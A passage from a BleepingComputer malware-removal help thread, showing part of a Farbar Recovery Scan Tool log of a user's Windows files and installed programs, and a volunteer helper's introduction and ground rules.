12:23 - 000808345 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042301.zip 2021-04-13 12:21 - 2021-04-13 12:21 - 001808740 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042057.zip 2021-04-13 11:49 - 2021-04-13 11:49 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\npm-cache 2021-04-13 11:28 - 2021-04-13 11:30 - 000000000 ____D C:\Python39 2021-04-13 11:28 - 2021-04-13 11:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.9 2021-04-13 11:28 - 2021-04-13 11:28 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Package Cache 2021-04-13 11:08 - 2021-04-13 11:28 - 000000000 ____D C:\ProgramData\chocolatey 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js 2021-04-13 11:04 - 2021-04-13 11:05 - 000000000 ____D C:\Program Files\nodejs 2021-04-13 11:04 - 2021-04-13 11:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\npm 2021-04-13 10:48 - 2021-04-13 11:02 - 028917760 _____ C:\Users\FRANCIS\Downloads\node-v15.14.0-x64.msi 2021-04-12 20:14 - 2021-04-12 20:14 - 000000000 ____D C:\Users\FRANCIS\Downloads\myfonts-win.exe 2021-04-12 20:14 - 2021-04-12 20:13 - 018481401 _____ C:\Users\FRANCIS\Downloads\myfonts-win.exe.zip 2021-04-12 18:29 - 2021-05-02 09:50 - 000000000 ____D C:\Users\FRANCIS\Desktop\myfonts-downloader 2021-04-12 18:29 - 2021-04-12 18:27 - 000003240 _____ C:\Users\FRANCIS\Downloads\myfonts-downloader.zip 2021-04-12 18:09 - 2021-05-06 15:20 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Code 2021-04-12 18:09 - 2021-05-06 09:42 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2021-04-12 18:09 - 2021-04-12 18:09 - 000001413 _____ C:\Users\FRANCIS\Desktop\Visual Studio Code.lnk 2021-04-12 18:09 - 2021-04-12 18:09 - 000000000 ____D C:\Users\FRANCIS\.vscode 2021-04-10 20:36 - 2021-04-11 14:46 - 000000000 ____D C:\Users\FRANCIS\Downloads\Maude 1972 to 1978 (Complete TV series in MP4 format) 2021-04-10 20:03 - 2021-04-10 20:03 - 000001114 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Rush.lnk 2021-04-10 20:00 - 2021-04-10 20:00 - 000001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2020.lnk 2021-04-10 19:57 - 2021-04-10 19:57 - 000001077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Prelude 2020.lnk 2021-04-10 19:55 - 2021-04-10 19:55 - 000001071 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2021.lnk 2021-04-10 19:51 - 2021-04-10 19:51 - 000001149 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder 2020.lnk 2021-04-10 19:48 - 2021-04-10 19:48 - 000001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Lightroom Classic.lnk 2021-04-10 19:45 - 2021-04-10 19:45 - 000001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe InDesign 2021.lnk 2021-04-10 19:40 - 2021-04-10 19:40 - 000001033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe InCopy 2021.lnk 2021-04-10 19:36 - 2021-04-10 19:36 - 000002500 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2021.lnk 2021-04-10 19:32 - 2021-04-10 19:32 - 000001920 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Fuse.lnk 2021-04-10 19:23 - 2021-04-10 19:23 - 000001095 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Dreamweaver 2021.lnk 2021-04-10 19:19 - 2021-04-10 19:19 - 000001036 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Dimension.lnk 2021-04-10 19:19 - 2021-04-10 19:19 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Dimension CC 2021-04-10 19:16 - 2021-04-10 19:16 - 000001349 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator 2020.lnk 2021-04-10 19:12 - 2021-04-10 19:12 - 000001033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge 2021.lnk 2021-04-10 19:10 - 2021-04-10 19:10 - 000001089 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition 2020.lnk 2021-04-10 19:07 - 2021-04-10 19:07 - 000001045 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Animate 2021.lnk 2021-04-10 18:43 - 2021-04-10 18:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maxon 2021-04-10 18:42 - 2021-04-10 18:42 - 000000000 ____D C:\Program Files (x86)\LooksBuilder 2021-04-10 18:39 - 2021-04-10 18:43 - 000000000 ____D C:\Program Files\Maxon Cinema 4D R23 2021-04-10 18:38 - 2021-04-10 18:38 - 000001257 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects 2020.lnk 2021-04-10 18:16 - 2021-04-13 18:56 - 000002121 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk 2021-04-10 18:16 - 2021-04-13 18:56 - 000002110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk 2021-04-08 15:15 - 2021-04-08 15:15 - 000000000 ____D C:\Program Files (x86)\Teams Installer 2021-04-08 15:12 - 2021-04-08 15:12 - 000002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002458 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002421 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002414 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002408 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000002400 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk 2021-04-08 15:12 - 2021-04-08 15:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools 2021-04-08 15:11 - 2021-04-08 15:11 - 000000000 ____D C:\Program Files\Common Files\DESIGNER 2021-04-08 13:22 - 2021-05-02 14:24 - 000000000 ____D C:\Program Files\Microsoft Office 2021-04-08 13:22 - 2021-04-08 13:22 - 000000000 ____D C:\Program Files\Microsoft Office 15 2021-04-08 13:16 - 2021-04-08 13:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Beta Apps 2021-04-07 09:58 - 2021-05-03 22:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\discord 2021-04-07 09:58 - 2021-05-03 21:16 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Discord 2021-04-07 09:58 - 2021-04-07 09:58 - 000002244 _____ C:\Users\FRANCIS\Desktop\Discord.lnk 2021-04-07 09:58 - 2021-04-07 09:58 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc 2021-04-06 19:05 - 2021-04-06 19:05 - 000254464 _____ C:\Users\FRANCIS\Downloads\Lecture 1 Power Cycle Rankine Cycle.ppt ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2021-05-06 15:26 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2021-05-06 15:25 - 2019-12-07 17:14 - 000000000 ___HD C:\Program Files\WindowsApps 2021-05-06 15:25 - 2019-12-07 17:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2021-05-06 15:03 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA 2021-05-06 15:01 - 2019-10-03 20:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2021-05-06 15:01 - 2019-10-03 20:00 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData 2021-05-06 14:51 - 2020-09-30 19:58 - 000859788 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2021-05-06 14:51 - 2019-12-07 17:13 - 000000000 ____D C:\WINDOWS\INF 2021-05-06 14:51 - 2019-05-24 05:05 - 000000000 ___RD C:\Users\FRANCIS\OneDrive 2021-05-06 14:47 - 2019-05-24 05:02 - 000000000 __SHD C:\Users\FRANCIS\IntelGraphicsProfiles 2021-05-06 14:45 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Registration 2021-05-06 14:43 - 2020-09-30 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2021-05-06 14:43 - 2020-09-30 19:34 - 000008192 ___SH C:\DumpStack.log.tmp 2021-05-06 14:43 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\ServiceState 2021-05-06 14:42 - 2019-12-07 17:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2021-05-06 14:18 - 2020-09-29 18:48 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Google 2021-05-06 14:07 - 2020-09-30 19:34 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2021-05-06 12:30 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2021-05-06 12:21 - 2019-12-07 17:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2021-05-06 12:16 - 2019-12-07 17:50 - 000000000 ____D C:\WINDOWS\system32\OpenSSH 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\PrintDialog 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SystemResources 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Provisioning 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\DiagTrack 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2021-05-06 12:14 - 2019-12-07 17:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2021-05-06 12:13 - 2019-12-07 17:52 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll 2021-05-06 11:45 - 2020-11-11 21:31 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{BC7AF1B8-2D77-4206-A075-B9FC5A37F7AE} 2021-05-05 14:51 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Packages 2021-05-05 12:23 - 2020-12-28 20:55 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2021-05-05 08:24 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\NDF 2021-05-04 18:04 - 2020-10-01 12:14 - 000000000 ____D C:\Program Files (x86)\USB Disk Security 2021-05-04 17:36 - 2019-12-07 17:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2021-05-03 21:54 - 2021-01-28 15:26 - 000000000 ____D C:\Users\FRANCIS\Documents\MATLAB 2021-05-03 20:12 - 2020-12-20 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\LenovoServiceBridge 2021-05-03 20:02 - 2020-11-16 20:09 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\CrashDumps 2021-05-03 08:56 - 2021-02-05 09:52 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Spotify 2021-05-03 08:55 - 2021-02-05 09:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Spotify 2021-05-02 21:07 - 2020-10-01 12:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\BitTorrent 2021-05-02 16:43 - 2021-02-24 12:59 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\BitTorrentHelper 2021-05-02 16:10 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\Other Files 2021-05-01 10:09 - 2020-09-29 18:20 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk 2021-04-30 08:09 - 2020-09-30 19:34 - 001284280 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2021-04-29 08:52 - 2020-09-30 20:15 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1001 2021-04-29 08:51 - 2020-09-30 18:58 - 000002376 _____ C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2021-04-28 15:36 - 2020-09-30 09:21 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\ElevatedDiagnostics 2021-04-28 13:17 - 2020-09-29 11:05 - 000000124 _____ C:\WINDOWS\win.ini 2021-04-27 08:12 - 2021-01-26 11:16 - 000000582 _____ C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job 2021-04-26 17:39 - 2021-01-26 11:16 - 000003252 _____ C:\WINDOWS\system32\Tasks\MATLAB R2019b Startup Accelerator 2021-04-26 17:39 - 2021-01-20 20:37 - 000003152 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:37 - 000002914 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003398 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003196 _____ C:\WINDOWS\system32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2020-11-17 18:19 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1002 2021-04-26 17:39 - 2020-10-07 18:29 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task 2021-04-26 17:39 - 2020-09-30 20:15 - 000003408 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2021-04-26 17:39 - 2020-09-30 20:15 - 000003184 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2021-04-26 15:34 - 2020-03-31 17:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\ZIP 2021-04-25 14:12 - 2019-10-31 17:56 - 000000000 ____D C:\Users\FRANCIS\Downloads\The Sims 4 [anadius Repack] 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\Users\Public\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\ProgramData\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:42 - 000000000 ____D C:\Program Files\WinRAR 2021-04-24 21:59 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2021-04-24 14:27 - 2020-10-07 18:28 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2021-04-22 11:57 - 2021-02-22 13:51 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\et-EE 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\es-MX 2021-04-16 13:24 - 2020-09-30 19:39 - 002877440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\ProgramData\Desktop\GeForce Experience.lnk 2021-04-15 12:00 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2021-04-14 14:25 - 2020-09-29 10:54 - 000000000 ____D C:\WINDOWS\system32\MRT 2021-04-14 14:20 - 2020-09-29 10:53 - 131963968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2021-04-13 20:40 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\The Sims Collection 2021-04-13 11:42 - 2020-11-14 20:38 - 000000000 ____D C:\ProgramData\Package Cache 2021-04-12 18:09 - 2020-09-30 18:58 - 000000000 ____D C:\Users\FRANCIS 2021-04-11 14:52 - 2020-09-29 19:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\D3DSCache 2021-04-11 09:04 - 2020-09-28 21:07 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2021-04-10 20:56 - 2021-03-30 16:24 - 000000000 ____D C:\ProgramData\Mozilla 2021-04-10 20:15 - 2020-09-28 22:08 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Adobe 2021-04-10 20:12 - 2020-10-05 12:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Adobe 2021-04-10 20:03 - 2020-11-14 21:00 - 000000000 ____D C:\Program Files\Adobe 2021-04-10 20:03 - 2019-07-08 11:54 - 000000000 ____D C:\Users\Public\Documents\Adobe 2021-04-10 20:03 - 2019-07-08 11:54 - 000000000 ____D C:\ProgramData\Documents\Adobe 2021-04-10 19:40 - 2020-11-14 21:01 - 000000000 ____D C:\Program Files\Common Files\Adobe 2021-04-10 19:40 - 2020-10-07 18:23 - 000000000 ____D C:\ProgramData\Adobe 2021-04-10 19:25 - 2020-10-07 18:26 - 000000000 ____D C:\Program Files (x86)\Adobe 2021-04-10 18:05 - 2020-10-03 17:56 - 000000000 ____D C:\Users\PC Gamer Jones\AppData\Roaming\Adobe 2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] 2021-04-08 15:12 - 2019-12-07 17:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2021-04-07 19:38 - 2021-01-20 20:37 - 002817904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll 2021-04-07 19:38 - 2021-01-20 20:37 - 002171760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll 2021-04-07 19:38 - 2021-01-20 20:37 - 001293680 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll 2021-04-07 10:21 - 2021-04-04 12:00 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims-4-updater-0.5.4 2021-04-07 09:59 - 2020-10-01 18:25 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\SquirrelTemp ==================== Files in the root of some directories ======== 2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ () C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini 2020-11-17 18:19 - 2020-11-17 18:19 - 000000000 _____ () C:\Users\FRANCIS\AppData\Local\oobelibMkey.log ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ======================== Also attached here is the addition.txt I would like to know the next instructions after seeing this. Thank you!

BC AdBot (Login to Remove)

BleepingComputer.com
Register to remove ads

#2 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 06 May 2021 - 07:47 AM

Greetings Jones2021Riano and :welcome:

to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.If you would allow me to call you by your first name I would prefer to do that.===================================================Ground Rules:

First, please keep in mind most of us at BleepingComputer volunteer our assistance for your benefit in your time of need. Please try to match our commitment to you with your patience toward us.
It is important to not run any tools or take any steps other than those I will provide for you.
Please perform all steps in the order they are listed. If things are not clear or you experience problems be sure to stop and let me know.
Please copy and paste all logs into your post unless otherwise requested.
When your computer is clean I will let you know, provide instructions to remove tools and reports, and offer you information about how you can combat future infections.
If you do not reply to your topic after 5 days I will assume it has been abandoned and I will close it.

===================================================Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and let me know.Thank you for your patience thus far.Please allow me just a bit of time to review what you have posted. Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#3 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 06 May 2021 - 07:54 AM

I read and understand all ground rules and my name is Francis.

#4 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 06 May 2021 - 08:16 AM

Greetings.Please copy and paste the Addition.txt report in your reply. It is not attached. Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#5 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 06 May 2021 - 07:55 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021 Ran by FRANCIS (06-05-2021 15:39:19) Running from C:\Users\FRANCIS\Downloads Windows 10 Home Single Language Version 20H2 19042.964 (X64) (2020-09-30 12:18:12) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3936790745-3440936247-791344644-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3936790745-3440936247-791344644-503 - Limited - Disabled) FRANCIS (S-1-5-21-3936790745-3440936247-791344644-1001 - Administrator - Enabled) => C:\Users\FRANCIS Guest (S-1-5-21-3936790745-3440936247-791344644-501 - Limited - Disabled) PC Gamer Jones (S-1-5-21-3936790745-3440936247-791344644-1002 - Limited - Enabled) => C:\Users\PC Gamer Jones WDAGUtilityAccount (S-1-5-21-3936790745-3440936247-791344644-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: McAfee VirusScan (Enabled - Up to date) {9D4501E6-72F6-2877-C789-89AF6F535B2C} AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} FW: McAfee Firewall (Enabled) {A57E80C3-3899-292F-ECD6-209A91801C57} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 21.001.20145 - Adobe Systems Incorporated) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 21.001.20150 - Adobe Systems Incorporated) Adobe After Effects 2020 (HKLM-x32\...\AEFT_17_7) (Version: 17.7 - Adobe Inc.) Adobe Animate 2021 (HKLM-x32\...\FLPR_21_0_3) (Version: 21.0.3 - Adobe Inc.) Adobe Audition 2020 (HKLM-x32\...\AUDT_13_0_13) (Version: 13.0.13 - Adobe Inc.) Adobe Bridge 2021 (HKLM-x32\...\KBRG_11_0_1) (Version: 11.0.1 - Adobe Inc.) Adobe Character Animator 2020 (HKLM-x32\...\CHAR_3_5) (Version: 3.5 - Adobe Inc.) Adobe Dimension (HKLM-x32\...\ESHR_3_4_1) (Version: 3.4.1 - Adobe Inc.) Adobe Dreamweaver 2021 (HKLM-x32\...\DRWV_21_1) (Version: 21.1 - Adobe Inc.) Adobe Fuse CC (Beta) (HKLM-x32\...\FUSE_2017_1_32) (Version: 2017.1 - Adobe Inc.) Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: - Adobe) Adobe Illustrator 2021 (HKLM-x32\...\ILST_25_2) (Version: 25.2 - Adobe Inc.) Adobe InCopy 2021 (HKLM-x32\...\AICY_16_1) (Version: 16.1 - Adobe Inc.) Adobe InDesign 2021 (HKLM-x32\...\IDSN_16_1) (Version: 16.1 - Adobe Inc.) Adobe Lightroom Classic (HKLM-x32\...\LTRM_10_1_1) (Version: 10.1 - Adobe Inc.) Adobe Media Encoder 2020 (HKLM-x32\...\AME_14_9) (Version: 14.9 - Adobe Inc.) Adobe Photoshop 2021 (HKLM-x32\...\PHSP_22_2) (Version: 22.2.0.183 - Adobe Inc.) Adobe Prelude 2020 (HKLM-x32\...\PRLD_9_0_2) (Version: 9.0.2 - Adobe Inc.) Adobe Premiere Pro 2020 (HKLM-x32\...\PPRO_14_9) (Version: 14.9 - Adobe Inc.) Adobe Premiere Rush (HKLM-x32\...\RUSH_1_5_50) (Version: 1.5.50 - Adobe Inc.) Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\BitTorrent) (Version: 7.10.5.45967 - BitTorrent Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\BitTorrent) (Version: 7.10.5.45785 - BitTorrent Inc.) CLUE - Accusations and Alibis 